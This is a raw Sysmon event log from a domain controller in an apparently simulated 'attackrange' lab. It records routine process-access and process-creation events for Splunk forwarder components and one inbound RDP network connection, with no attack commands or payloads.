13:37:18.845{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013791Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.845{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013790Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.845{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013789Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.845{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-490E-6000-6E05-000000009A01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013788Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.845{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-490E-6000-6E05-000000009A01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013787Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.846{08A6967A-490E-6000-6E05-000000009A01}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013786Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.329{08A6967A-490E-6000-6D05-000000009A01}40564244C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013785Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.173{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-490E-6000-6D05-000000009A01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.173{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.173{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.173{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.173{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.173{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-490E-6000-6D05-000000009A01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.173{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-490E-6000-6D05-000000009A01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:18.174{08A6967A-490E-6000-6D05-000000009A01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:19.970{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-490F-6000-6F05-000000009A01}32C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:19.970{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:19.970{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:19.970{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:19.970{08A6967A-4287-6000-0C00-000000009A01}588984C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:19.970{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-490F-6000-6F05-000000009A01}32C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:19.970{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-490F-6000-6F05-000000009A01}32C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:19.971{08A6967A-490F-6000-6F05-000000009A01}32C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:19.001{08A6967A-490E-6000-6E05-000000009A01}7484184C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:21.392{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000013806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localRDP2021-01-14 13:37:28.351{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse41.218.224.9941-218-224-99-adsl-dyn.4u.com.gh12893-false10.0.1.14win-dc-250.attackrange.local3389ms-wbt-server 10341000x800000000000000013805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:30.173{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4780-6000-3905-000000009A01}6868C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:37:32.157{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4781-6000-3A05-000000009A01}6928C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:01.376{08A6967A-4288-6000-0D00-000000009A01}6124916C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0F05-000000009A01}1084C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013837Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013836Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:38:03.422{08A6967A-4288-6000-0D00-000000009A01}612996C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42269|c:\windows\system32\rpcss.dll+423a2|c:\windows\system32\rpcss.dll+426df|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 